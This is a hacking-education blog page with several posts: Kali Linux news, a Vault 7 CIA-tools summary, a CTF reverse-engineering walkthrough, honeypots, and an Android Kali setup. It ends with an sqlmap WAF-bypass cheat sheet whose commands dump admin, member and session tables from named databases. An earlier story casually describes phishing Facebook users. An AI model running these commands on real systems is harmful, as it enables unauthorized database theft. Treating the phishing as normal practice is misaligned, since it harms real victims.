Learn Penetration Testing And Ethical Hacking Online.


  • Facebook
  • Popular Posts

    Showing posts with label Ethical hacker. Show all posts
    Showing posts with label Ethical hacker. Show all posts
    Kali Linux 2020: news and download of this distribution of ethical hacking

    When we talk about Kali Linux, we mean one of the most important and best known ethical hacking suits worldwide. It offers a wide range of possibilities to users and that makes each new version make many are attentive to their news. In this article we echo thenews of Kali Linux 2020, as well as explain how we can download this Linux distribution.

    As often happens with each new update, whatever the type of program or system, they bring improvements. These improvements translate into new functions or tools that make the day-to-day life of users benefit. But you also have to keep in mind that with each new version, present problems are corrected.

    Kali Linux allows users to perform different ethical hacking tests. Now they have a series of novelties that make this Linux distribution even more attractive. We are facing the third update of this current version. We will comment on the most important changes.

    What's new in Kali Linux 2020

    One of the novelties of Kali Linux 2020 that we can mention is that they have started usingCloudflare CDN to host the repository and distribute content to users. This they do to improve the quality and speed of downloads.

    There are also changes regardingmetapackages. Now there is an additional and unique image called kali-linux-large-2020-amd64.iso.

    Kali Linux 2020 is not a great update that brings very significant changes, however ithas improved certain applications. For example we talk about tools like Burp Suite, HostAPd-WPE, Hyperion, Kismet andNmap. All of them have been updated to a new version and have included improvements.

    One of the significant changes in relation to applications is that it now includesAmass. It is a tool that security professionals can use to map the network and discover possible external threats. Now this tool comes standard with Kali Linux.

    For the rest, it should also be mentioned that improvements have been made in terms of failures and security errors. Corrections that, in short, make this new version safer.

    How to get Kali Linux 2020

    It should be mentioned that for those users who already have this distribution installed and have it updated they will not have much to do. They would simply have to run the root @ kali command: ~ # apt update && apt-and full-upgrade to make sure they have the most current version.
    For those users who do not have it installed or want to obtain the ISO for some reason, it is best to go to the official website . There you just have to go to the download section and download the version you want (64 bits, 32 bits ...).

    As we always say, it is important to download software from official and reliable sites. We must avoid doing it from third-party links that we don't really know who it belongs to and what could be behind it.

    In addition, having updated systems can bring important benefits. On the one hand we will have the most updated tools and thus obtain improvements in performance. However, security is also very important. Security vulnerabilities are corrected with each new update . Faults that can be exploited by cyber criminals and that have been patched.
    Continue Reading
    CIA Hacking Tools for Mac and iPhone

    The trail of documents leaked by Wikileaks continues. After having published almost 9,000 documents about "Vault 7" , which contain information on spy tools used in Smart TVs, smartphones, computers and even cars, Wikileaks returns to the attack with details about how the Mac and iPhone have been spied by the CIA for several years .

    WikiLeaks leaked 12 new documents that provide a more in-depth look at the hacking techniques that the CIA allegedly used to hack Apple devices, such as Macs and iPhones. This leak, which WikiLeaks identifies under the code name Dark Matter, is part of a series of dumps called Vault 7, which WikiLeaks claims are hacking tools obtained from the CIA. 

    The first leak, called Year Zero, came to light in early March and included wiki pages from the CIA intranet, with documentation for some of the CIA's cyber weapons.

    In this original leak, documents related to the CIA's supposed arsenal of OS X and iOS hacking tools were included. Today's Dark Matter dump provides 12 new documents that contain much more information about those tools. 

    Wikileaks had promised that those 9,000 documents were just the beginning, and that's how it was. Today they are unveiling the project "Dark Matter", which belongs to "Vault 7" and which consists of espionage tools for Apple devices. These would be able to directly infect the computer's firmware, which means that neither reinstalling the operating system would eliminate the infection.

    Dark Matter


    For example, Sonic Screwdriver is a hacking tool that CIA operators can deploy from an Apple Thunderbolt adapter to Ethernet.

    This hacking tool allows the operator to execute malicious code from a USB, CD, DVD or portable hard drive, during the boot of a Mac, even if the firmware of the Mac is password protected . 

    Another tool, called DarkSeaSkies , "is an implant that persists in the EFI firmware of an Apple MacBook Air computer, installs a Mac OSX 10.5 implant and executes a user space implant." 

    In addition, DarkSeaSkies includes smaller components. 

    DarkSeaSkies consists of three different tools:

    • 1. DarkMatter : An EFI controller that persists in the firmware and installs the other two tools.
    • 2. SeaPea: A Mac OSX implant for the space of the kernel that executes, and provides stealth and privilege to the implants of the user's space.
    • 3. NightSkies : A Mac OSX implant for the user's space that goes to a listening post and provides control and command.

    The other two tools, Triton and DerStarke , are related. Triton is an automated implant for Mac OS X, while DerStarke is a diskless, EFI-persistent version of Triton. 

    As you can see, all the tools are directed to the EFI / UEFI (Unified Extensible Firmware Interface ) specification, which is a software component that helps with the initialization of hardware components while the operating system, the old BIOS, is started. 

    The placement of malicious code in EFI / UEFI assures an attacker the possibility of executing that malicious code on each boot, even if users re-install their operating system.

    "Sonic Screwdriver"

    These new documents detail how the CIA has been infecting MacBook Air devices over the past few years using something they have dubbed "Sonic Screwdriver", yes, in honor of the famous Doctor Who weapon. This tool can be placed on all types of USB devices, peripheral cables and adapters , such as the Thunderbolt to Ethernet that is widely used in this notebook, which when connected to the computer install spyware programs, regardless of whether it is protected by a password. 

    This malicious code is installed during the boot of the computer and is stored permanently in the kernel, so access credentials or some other data is not needed, and it remains even if the entire device is formatted. The worrying thing about this is that the documents reveal that the CIA has continued using this tool during 2016, and they have even updated it for new Mac computers, regardless of whether they are portable or desktop. 

    Within "Dark Matter" we also find other spy initiatives such as "NightSkies 1.2", which is used since 2008 to infect new iPhoneIt should be noted that this tool, which is a "beacon / loader / implant" has also been updated over time, but unlike the Mac, it is designed to be installed on new devices. This means that the CIA has intercepted iPhone orders and directly attacked production lines to place this malware on the devices, something they have been doing at least since 2008. 

    Wikileaks notes that the Mac tool is very specific for well-located targets, where They have placed modified cables and adapters with the idea of ​​spying on certain groups in different parts of the world. But the case of the iPhone is different, since here the entire production chain had to be attacked, which means that many iPhone have this malware installed without the user knowing.

    CIA pointed to iPhones one year after its launch

    Although it does not appear prominently in the description of the tool, the DarkSeaSkies NightSkies module also comes with support for iPhone devices. 

    A July 2008 document, one year after the launch of the iPhone , details how NightSkies could provide "upload, download and execution capability" on Apple iPhone 3G v2.1 devices. 

    The document says that CIA operators needed physical access to install the NightSkies implant , but once installed, NightSkies would only work when it detected user activity on the device, hiding traffic between the user's actions. This provides an attacker sponsored by the state as the CIA with the advantage that all APTs want more, which is stealth.

    Although the leaked documents do not mention this detail, WikiLeaks states that NightSkies "is expressly designed to be physically installed on fresh factory iPhones," and that "the CIA has been infecting the iPhone supply chain of its targets since at least 2008. " 

    At the time of writing the CIA has never officially recognized the authenticity of the leaked WikiLeaks documents. However, motherboard pointed out yesterday that the Agency had asked a judge not to allow documents downloaded by WikiLeaks in a case, as they were "classified content", accidentally acknowledging their authenticity. 

    More information | Wikileaks

    It is not clear if the CIA has the ability to hackmore modern products and security measures much stricter than those of then, although it is obvious that this is one of your goals. 

    It is also clear that Apple is not particularly happy with these revelations, judging from the statement issued by the Cupertino firm:

    We have made a preliminary assessment of the WikiLeaks revelations this morning. Based on our initial analysis, the vulnerability only affected the iPhone 3G and was solved in 2009 when the iPhone 3GS was launched. Additionally, our preliminary assessment shows that the alleged vulnerabilities were resolved in all Macs launched after 2013.

    We have not negotiated with WikiLeaks to obtain any information. We have provided them with instructions to deliver any information they desire under our normal process under our standard terms. At the moment we have not received any information from you that is not in the public domain. We constantly defend the security and privacy of our clients, but we do not condone the theft or we coordinate with those who threaten to harm our users.

    The tone used by Apple is not the usual one. Partly because, although WikiLeaks has offered to collaborate with the companies affected by these tools to cover their security holes, the organization has indicated that it will only do so if the affected firms accept a series of undisclosed conditions. 
    Continue Reading

    Hi fellas,
    A few days ago, I decided to start my adventure in the reverse engineering domain. I was quickly overwhelmed by a bunch of information and op codes that confused me a lot, even with solid knowledge in assembly and programming.
    Reverse engineering can seem complex at the first glance, however, with a good methodology and toolkit, everything becomes more significant.
    This article claims to guide you, based on my own experiences, in your first steps in this strange and odd universe.


    So, here we are, you downloaded your first binary and now … what to do ? RE requires two types of analysis, static and dynamic. The static analysis will help you to have a better overview and understanding on what going on within the binary, whereas the dynamic analysis will allow you to follow, step by step, the changing that occurs within each register, which system calls are used, etc.
    The following methodology is pretty basic. Indeed, we start to perform static analysis to spot odd pieces of code which have to be deeply analysed through dynamic analysis. Pretty simple right ? But which tool can you use ?

    Static analysis

    I must admit that I didn’t take the time to assess the different tools available on the internet. Indeed, I instantly jumped on binary ninja 2.5k due to its low cost (99$), compared to the functionalities provided.
    Binary ninja is dedicated to static analysis, providing an awesome GUI, which is priceless when you have to deal with such amount of information !

    As you can see on the image above, binary ninja displays the entire call graph of your executable, simplifying the way to understand how each block interact together. Moreover, you can easily switch of view, via the right bottom select menu. Lastly, the left side enumerates every function called, directly accessible thanks to a simple mouse click.
    Upstream, this software allows:
    • To place comment within the code
    • To patch binary through assembly or C code
    • To access an API to develop your own plugin to accelerate the analysis process
    • To access a bunch of plugins available from their GitHub 333
    • Other functions that I didn’t use yet ^^
    Note: A demo version 672 is available for free and should be enough for beginners.

    Dynamic analysis

    Dynamic analysis can be done through various tools e.g gdb, radare2, etc. From my personal experience, radare2 is far from being user-friendly. Indeed, without the stylesheet, I wasn’t able to remember the shortcuts, which made me waste a lot of time ! However, gdb seems to do the job and pretty well… Moreover, the gdb user experience can be improved by using peda 761 (Python Exploit Development Assistance for GDB), enhancing the display of gdb by colourising and displaying disassembly codes, registers, memory information during debugging.
    Here is the enhanced CLI:


    To show you how to apply and use this methodology, I chose to show you how I successfully reverse the third phase of the bomb lab, developed by the Carnegie Mellon University, which @_py makes available on his CTF platform skidophrenia 741.
    Here is the phase 3 entry point :

    Assumption : The solution seems to have 3 components, two integers and 1 character
    Let’s break on the 0x08048bbf address to see the registers state.
    Input tried: 1 2 3

    Ok, well, it seems that the register EAX represent the amount of argument passed to sscanf. Which confirms our previous assumption. Indeed, at least three values are necessary to pass to the next block.
    Here are the next blocks :


    1. Check if the first integer is above 0x7. If yes, the bomb will explode (block not shown in the picture)
    2. We jump to the case corresponding to our first argument
    3. Set the BL register to 0x6b and compare the third argument to 0x7b. If the values are equal, we jump to next block, otherwise the bomb explodes.
    4. Check if the second argument is equal to BL, which has been set previously. If not, the bomb explodes.
    Consequently, we can assume that the password should be :
    • 3: representing the third case
    • k: corresponding to the ascii value of 0x6b
    • 251: corresponding to the decimal value of 0x7b
    Let’s try it !

    Challenge completed ! As you can see, this challenge didn’t need so much dynamic analysis, however, this is quite rare. I chose this exercise to show you the importance to take your times to perform static analysis cause it can easily represent 70% of the work. So, scrupulously analyse each piece of code to reach your goal !
    Continue Reading
    Honeypots in the Cloud

    Use Honeypots

    Why Use Honeypots?

    For an organization that has a reasonably complete security posture, including a mature threat intelligence capability, the implementation of a so-called “honeypot” should be considered. A honeypot is sort of a digital entice that's set for potential attackers. It lures the attackers within by mimicking it to be a target they were searching for, sometimes with deliberate built in vulnerabilities, apparently waiting to be exploited.
    Once the attackers use the honeypot system, thinking they have reached the intended target, all actions are recorded and all modified and newly-dropped files are captured. In this method, a great deal can be learned about potential adversaries, their Tools, Techniques and Procedures (TTP’s) and how they would circumvent the organizations actual production security controls. It permits for actually proactive security intelligence gathering, although there are some caveats.

    The Issue With Honeypots

    A honeypot could be a nice weapon within the arsenal of defensive security groups. Its use does, however, come with some challenges.
    The obvious one is that the risk that AN attacker with success exploits a honeypot and so manages to maneuver laterally into the particular production network. It is vital to isolate a honeypot from the other network! This looks like a straightforward task, but it only takes a single forgotten system or a single firewall rule change to create a very dangerous situation. Networks are inherently complex.
    Another challenge is that the quantity of your time and therewith, are the costs that come with the management of a honeypot. The system will need to be configured and maintained, of course. But that's not all: The captured activity has to be used inside the organization’s security groups for it to be of any worth. This will take tons of your time to structure and to suit inside operational processes. The information will need lead to actionable intelligence, such as by blocking the adversary’s infrastructure, the creation of Intrusion Prevention System rules or the creation or tuning of malware signatures.

    Using the Cloud

    Some of the mentioned challenges will be overcome by employing a public cloud system to host a honeypot.
    The public cloud provides complete isolation from any production network. There is additionally no want for specific hardware or dedicated net connections. Once a machine has been compromised and the data is collected, a snapshot can be used to revert the system back to its captured state before the attack took place.
    Another nice advantage of employing a public cloud infrastructure for a honeypot preparation is that it will be distributed anyplace within the world by choosing the specified geographical locations inside the cloud system configuration. A detector will be placed in East Asia sooner or later and may be moved  to Deutschland successive with simply a couple of mouse clicks. Considering the actual fact that noticeable attacks and attackers will disagree tons looking on the placement of the exposed system, this can be nice for analysis and intelligence gathering functions. A honeypot set inside Russia can see quite totally different vary of attacks and scanning activity compared to a similar system in Brazil. A distributed honeypot network consisting of a manager and several sensors such as the Modern Honey Network (MHN) benefits even more from this flexibility.
    Some honeypot product are developed around a personal cloud instance likewise, like the Thinkst (Cloud) Canary. Canary honeypot devices square measure deployed at strategic locations inside the customer’s network. These sensors all report back to a central, cloud-based system allowing the customer to detect perimeter activity and lateral movement inside the production network when a real attacker unexpectedly interacts with one of these sensors. This system doesn't return low-cost, however it'll still offer vital visibility once all different detections have did not keep the attacker out. In this case, the cloud connectivity assists in the preservation of logs, improved customer accessibility and the very quick and easy deployment of what can be a complex honeypot infrastructure.


    There is a right away correlation between placement and relevance once it involves honeypots.

    For a honeypot to produce the foremost relevant (and actionable) output, it must be somehow coupled to the organization a possible attacker is curious about. this could potentially be via a pretend company website or a registered domain name. solely then can the organization be able to observe attacks that square measure extremely targeted, rather than straightforward scans from attackers trying to find any low-hanging fruit. Of course, if attainable, inserting a honeypot within the organization’s existing cloud perimeter can even facilitate within the identification of targeted attacks, however its isolation must be well-designed.

    There is additionally a legal and policy side to the utilization of honeypots. Some cloud suppliers don't significantly just like the plan of directional hackers into their networks and aggregation malware at intervals their infrastructure. After all, once the host is compromised, there's an opportunity it is accustomed attack different targets on the web. once this can be the case, it may harm the name of the cloud supplier (hosting the compromised system) and will even result in the block of that provider’s ip ranges and domains, impacting its different paying customers.

    When unsure, invariably look around the web usage policies or contact the supplier for permission before setting up a cloud-based honeypot system.
    Continue Reading
    How I became a hacker


    I don’t want to make it any longer by adding some introductory part so lets get straight to the point. Okay wait, I just want to tell you something, I am a noob. Let’s go now!

    Getting into infosec
    So I am 19 years old at present and I was living a pretty boring life till the age of 15.

    Then I got a computer, I “wasted” more than one year in playing games & social media which I kind of regret.

    But one day, I decided to have some fun and I searched on google “How to hack facebook account” and I followed one of the results which was about Phishing.

    I created a phishing page after struggling for an hour and posted it on facebook with the caption, “This app lets you see who views your profile secretly” and about 5 people fell into that trap.

    “Damn! This shit is lit”, I said to myself. When you do something new and it goes well, you get excited about the possibilities and the same thing happened with me.

    After this incident, I joined some facebook groups related to hacking bur they were full of spam.

    I was very eager to learn hacking so I created my own group named “Ultimate Hackers” which I know sounds really very cringy. I started inviting people to join it whom I think had good knowledge.

    One month passed and now I was aware of the very basics concepts like phishing, keylogging, RATs etc. I wanted to learn but I wasn’t sure “what” to learn and then I saw two guys arguing about something on a thread. They were using terms that I had never heard so what I did was that I noted down all those terms in a notebook. I picked one of those terms and searched about it on google and started reading about it but then there was other terms that I didn’t knew.

    An idea came into my mind, I wrote down those terms as well and picked one of them to read about it and again noted down things I didn’t understand. I was learning a lot of new stuff this way and this time it was happening really fast because of the recursive nature of this methodology.

    At the end of the day, I used to post what I learnt in my facebook group in my own words which people liked very much and the group started to grow very fast.

    Apart from my inner desire, now there were people who supported me and asked me to write on various topics. Everyone wants to get appreciated for what they do, its basic human nature. Appreciation makes you work harder to satisfy expectations and the same thing happened with me.

    I met some other genuine people and we became a team, “Team Ultimate” which I don’t think is a cringy name at all.

    Anyways, everything was going extremely well, I started to explore web apps hacking but then something happened which changed my life, in a good way.

    Well I was wandering around github and I found a XSS scanner written in python named XSSYA . I liked it, big ass banner & ability to retrieve PHPSESSID without even executing the payload . Yep, I know that’s the most autistic thing ever but I didn’t know much at that time so I thought its cool and I downloaded it.

    But when I ran it, it threw some errors and I fixed them without any programming knowledge, thanks to stackoverflow and common sense.

    So it was working now and I thought its open source and its license says anyone can modify and redistribute it so I changed the banner and the author name self-facepalm.

    Somehow I managed to integrate it with another program named Damn Small XSS Scanner.

    The final script was working fine and I was proud of this little achievement of mine so I created a github account and uploaded it.

    I had no idea how but a website featured it and the original author of the tool found out that I am using his code. He opened an issue on github and told me that I am a fake guy and people saw that and some of them called me a script kiddie and a “copy-paster”.

    You know that the smallest* unit of matter is an atom right? Take one electron out of it and split it into thousand parts and take one part of them and that’s the size of my ego and it got hurt :v

    A new start
    My condition was like a injured lion coughs maybe that’s too much, a cheetah maybe? I just wanted to take that weight off my chest and there was just one way to do it, learning XSS and python.

    How I learned Python?
    The best way to learn a programming language is to code in it. No book, youtube niggas or $99 courses can teach you programming, just fucking start writing code. Of course you need resources to learn from so here’s what I did to learn python

    “Learn Python The Hard Way” [Book]
    codecademy.com [Online interactive course]. It gave me a glimpse of real world programming problems.
    By modifying open source programs (without putting them on github this time :p ). This part helped me the most, I learned a loooooot. I learned about different libraries and the way developers solved a particular problem and what not.
    By writing my own tools from the scratch
    How I learned XSS?
    Random Blogs (10%)
    brutelogic.com.br (15%)
    XSS Challenges (10%)
    Looking at payloads & figuring out how they work (25%)
    Learning HTML, Regex & JS + Experimenting (40%)
    However my ego was somewhat satisfied but I didn’t stop after it, I kept learning new attacks and techniques. I learned new programming languages. I also started to explore OSINT, GeoINT & SE.

    I have done stuff. Yep, that’s my only achievement so far. No hall of fame from beg coughs under the breath: why do I say such controversial stuff so I was saying I don’t have any hall of fames from bug bounties, no certification etc.

    Btw the stuff I have done includes around 30 programs I have contributed to the community. Thanks for loving them, you made #1 python Github developer in India and #78 worldwide.

    6 of them have been featured in Black Arch & others have been featured in some respected blogs & websites like hakin9 magazine, shodan, penetester academy, kitploit and 69 others :grinning:

    Tips & Resources
    Here are some pro coughs noob tips from my side:

    Note down & google unknown terms, recursively.
    Read the same thing from 5 different articles. When you read a blog, you learn what the writer knows but reading the same thing from 5 different articles lets you see the topic in consideration from different sides.
    When you are trying to learn a new programming language with the help of a video course or a book, you must write programs in it otherwise you won’t grasp anything. Programming is about innovation and problem solving.
    I have a request to all the beginners out there, please don’t get into bug bounty. If you are doing hacking for t-shirts or money, you are doing it wrong. Okay, do whatever you want to but please don’t call yourself a “security researcher”. Okay, do whatever the fuck you want but please don’t spam my facebook, linkedin and twitter with a….never mind, lets move on to the next one.
    Learn Regular Expressions. It is an amazing skill to have and it will make you better at various unix operations, bypassing security filters and will help you solve a lot of programming problems.
    Start a blog! Writing articles helps you question your knowledge. Some people will read it and will appreciate your work, it will make you feel better. Some will point out your mistakes or things you missed, it will make you better. So it’s a win-win deal!
    When you get trolled or humiliated for something, you always have two options. First one is to stay where you are and crush your self respect. The second one is to take it as a challenge, work hard and be better than the people who trolled you. I got trolled for Python and XSS right? Look at me now, I wrote XSStrike which is an XSS detection suite written in python. XSStrike is the best tool in its category. And it will stay at the top unless someone’s ego gets hurt :wink:
    Blogs, documentations, white papers, presentations and slides are better than any hacking courses or books.
    Twitter is an awesome source for good reads and latest infosec related events. You can some of the good people in my following list .
    Instead of providing you a huge ass list of stuff I am leaving links which have huge ass lists of stuff :grinning:


    That’s all for now. Keep making & breaking things!
    Continue Reading

    Use the damn terminal

    This guide was written for Debian and Ubuntu but should work with any linux distribution and with OSX.
    What we, hackers, need is a portable easy and fast to install setup requiring minimal configuration. It’s also important the setup to work servers might you need it.
    Here’s some tips and advice to help you out.

    Keyboard typing

    To be honest, that part sucks. It’s a hard skill to acquire but it’s the most important one. If you can type fast, without looking at your keyboard and without typos, you’ll be like those Hollywood hackers. No software can beat that.
    Klavaro is your friend. Just “apt-get install klavaro” and here you go. Check this guide for more info.

    Terminal emulator

    Don’t use the default terminal emulator. It suck.
    What we’re going to use here is Terminator. It’s not that great but it works everywhere. What we need it for is split windows. Download it. As you get accommodated to using the terminal you’ll need to multi task.
    Make sure you change the font to something that suits you. Smaller is better as it will allow you to cram more window in your term.
    At some point you’ll probably want to customize your options. Check the terminator config manual.

    Term browsing

    Yep… It’s a thing. And it’s very useful. W3M is your friend. “apt-get install w3m” and “w3m duckduckgo.com”.

    Multiple sessions over multiple servers

    Byobu is a neat software to help you manage multiple terminal sessions. It keep them alive on your local and remote machines. Once installed use the F1 key to configure, access help and use the F2, F3, F4 to create and more between windows.
    Just type “apt-get install byobu”. To enable by default on remote servers use “byobu-enable”.
    My favorite trick is keyboard copy/paste. Press F7 and move around, then press spacebar to select your text, press enter to return in normal mode. Paste with F12 and then CTRL plus ].

    Bash the shell

    Bash is great and all but ZSH is greater.
    The first thing you need to learn about is auto-complete. It’s what happen with you start typing a command or a path and hit the TAB key. ZSH auto-complete is freaking awesome.
    Then there’s OhMyZSH. One command curl install and you’ll have a complete setup and you’ll be ready to roll. It’s a bliss. Be sure to check included themes and plug-ins.

    Vim (and not Emacs)

    Vim is a great code editor but… vim.spf13 made it awesome. Perfect even. Vim is hard to learn at first but it’s on all systems. You’ll be glad to know about it when you’ll start navigating in those weirds Russian servers ;)

    Color schemes

    At some point you’ll want to choose and get used to a color scheme. It’s really important when you spend hours in the terminal so take your time to try some out.
    Solarized is the most popular one. I don’t like it but it’s everywhere. You’ll always be able to use it whatever app your on.
    If you need help choosing a color scheme check Vim Colors.

    Powerline fonts

    Some themes and softwares like Vim can take advantage of patched fonts and provide you with advanced feedback. Installing them is easy.
    cd ~/Downloads ; git clone https://github.com/powerline/fonts ; cd fonts ; ./install.sh ; cd .. ; rm -fr fonts

    With ZSH

    To take advantage of powerline fonts with ZSH use the agnoster theme. You’ll need to edit your ~/.zshrc file.

    With SPF13 VIM

    You need to create ~/.vimrc.before.local and add the following line “let g:airline_powerline_fonts=1”.
    Continue Reading
    How to Turn an Android Phone into a Hacking Device Without Root

    well not everybody has access to a Kali Linux machine there are nearly two billion Android phones out there today we'll show you how to turn any Android device into a Kali Linux machine on this tutorial refers to the space outside of an operating systems kernel meaning anything that doesn't actually have root access 
    we can use an app of the same name to install Kali Linux or any other Android operating system that's supported on any unrooted Android phone while this is pretty incredible there are a couple limitations to this but in general you are able to communicate with the instance of whatever Linux device you want via SSH or VNC now depending on what you want to run this is a pretty important decision because VNC gives you a full graphic user style interface whereas SSH is more simple but limits you to the command line only now today we're going to explore some command line tools so 

    we'll be using SSH but you can also check this out using VNC if you want to explore this with a GUI interface maybe if you're a little bit more of a beginner and you want to be able to click around and have the kind of general interface experience you would expect with Kali Linux now in order to follow along you will need any unrooted Android phone and in this example I'll be using a Samsung phone but you can use pretty much anything because it doesn't need to be rooted in order to work once you have one then we can begin 

    Install the ConnectBot App

    now to get started with installing a Linux system on your Android device you'll need to have a way of

     with it as I mentioned before we're going to be using SSH to communicate with our instance of catalyst of Kali Linux so to do so we can go ahead and use the recommended app which is connect bot although I've downloaded juice SSH to go with a previous version that used to work and I'm going to continue using it for this particular guide they both work roughly the same so you can use whichever one is your preference in general I find that juice SSH works just fine for SSH based connections although connect bought may work a little bit better for VNC now once you have 

    Install the UserLAnd App

    UserLAnd App

    this installed and we have a way to communicate we need to download the you and app so you'll need to look for this icon and then go ahead and press install and then once this download completes you'll be able to open 
    this up and basically what will happen is you'll get a list of available operating systems that you can run and these are very stripped-down versions so they won't have some of the tools that you might normally recommend recognized even things like ifconfig or ipconfig all that stuff will just not work so in order to get that working we'll need to install a couple things and even installing that won't work until we do an update so we've got kind of a list of things to do ahead of us and it's gonna be a little bit of work before we get there but once we do we'll be able to run some really interesting tools without needing to rely on routing our device now that this is installed 

    Create a New Filesystem

    new Filesystem

    let's go ahead and open it for the first time and we'll see there should be a list of different operating systems and while initially we needed to work with Ubuntu we can our debian we can now go ahead and download Kali directly although as I mentioned before this is going to be a very stripped-down version of Kali Linux so it'll need the ability to access our storage so we'll click OK and this will allow us to be able to actually download this and have a little Drive on our system that's hosting this Linux system so here we'll go ahead and type in our information and then a password and then a VNC password now once you're done with this hit done and then continue and as as you can see the VNC password is very picky so it needs to be to be between six and eight characters all right there we go I'm not gonna save this and then as soon as this is done we'll need to select a type of connection that we want to use to connect with this a device so we'll go ahead and click SSH and we'll be able to create this Kali Linux instance and then communicate with it via SSH as soon as the download and unpacking of the Kali Linux files is complete alright now that it's settled on the app you can see that it's copying it to local storage and then after it extracts everything this should be set up and ready for us to start working with 

    Interact with the Filesystem

    Interact with the Filesystem

    now we'll need to select which type of connection we're going to use and since previously we indicated SSH we're going to be using our tool that we downloaded in the first step which is either going to be connect bot or juice SSH depending on which one you decided to go with once this process completes we should see something asking us which one we want to select here we go now initially this will try to drop us into our SSH default program so I'm gonna go ahead and type in the password I set and then I should see that I am in Cali in userland so you can see I am now the username I set up at localhost which means I have successfully loaded a kali system on this Android device

     so let's try something really basic ifconfig it doesn't work so you might know that pretty much nothing is gonna work on this very stripped-down version now the reason for that is because the installation process is already pretty long with how many files it needs to download and install so trying to get everything all at once it's just not going to work so instead 

    Update the OS

    we'll need to try to install this but unfortunately that won't work either let's take a look and see why so if I type apt install and then net tools you can see that oops I also need to be sudo  you can see here that it'll attempt to do so and usually it'll run into some errors where it's not able to resolve something in some cases it might be able to fetch it but a lot of times it will actually not be able to now I think it looks like my example works so now if I type ifconfig it should succeed but a lot of tools won't so let's go ahead and run an update first to make sure that our system is prepared and ready to use on this cally device so let's go ahead and type apt install update and our new kali system will also need root constantly because you have to remember that we are just a guest on the system we're not actually root so then once this update finishes let's see there we go once this update process finishes we should have a fresh list of all the sources meaning that anything that's been updated since this installation was this particular image was released will be able to be updated normally and will have all the freshest data that we need to keep these packages updated this is also a good step to run before doing an apt upgrade because sometimes some packages in the upgrade will fail if they can't be resolved so once we have all the information we need to run the upgrade this would be a good time to go ahead and run that upgrade so now we have a list of all the sources in kali that are available at our fingertips so what is one of the most interesting things 

    Install Software

    we can do well we can go ahead and use routersploit which is a really fun tool and in order to download it all we need to do is type apt install oops sudo abt a pea in stall routers wait now you can see just like this will type Y for yes and we can go ahead and install this really interesting and fun tool to use against routers and embedded devices on a network and be able to use up from any Android device with a maybe five-minute installation on a fast internet connection so this is a really cool way of getting started with some of these tools and if you want to use router sploit a little bit more you can check out our tutorial on using it but I'm going to address another problem that can be fixed with the installation of a simple tool when you're using SSH on an Android device now as you tend to use this for a while you'll notice that sometimes your performance of SSH doesn't keep up with whatever it is you're trying to do and you might either get kicked out or find some other issues with using SSH now if you drop your SSH connection in the middle of doing something this can be extremely frustrating so screen is a solution that allows you to basically disconnect from an SSH screen and then jump back into it later so if you're starting to get frustrated because your Android device is bugging out a little bit and maybe not connecting properly you can disconnect from the screen session and then reconnect and see if it works better this is really useful because you can even theoretically pass a screen session between devices if you're using SSH on maybe a server or raspberry pi so screen is an amazing tool if you want to manage multiple SSH sessions or if you're dealing with something just by SSH so as soon as this finishes installing routers boy we'll go ahead and install screen and we can do the same thing with other tools that are really useful to have on an Android device like netcat there we go now to install screen you can just type  sudo apt install screen  now if you verify we have this working we can just type man screen and it looks like we don't have the manual installed but for now we can type screen tack H here we can learn more about how to use it and verify that we've successfully installed it while there's no doubt that it's extremely useful to have kali running on an Android device.
    Continue Reading
    sqlmap advance commands and waf bypass method

    sqlmap temper waf bypass method

    --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
    --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
    --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
    -v3 --technique=T --no-cast --fresh-queries --banner
    sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs

    -f -b --current-user --current-db --is-dba --users --dbs idcategoria=8

    --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --     tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

    sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell

    --risk 3 --level 5 --random-agent --proxy --dbs
    --random-agent --dbms=MYSQL --dbs --technique=B"
    --identify-waf --random-agent -v 3 --dbs
     : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
    : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
    --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
    --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent

    sqlmap.py -u -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
    --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
    -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu

    C:\Python27\python.exe sqlmap.py --wizard
    --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql

    sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

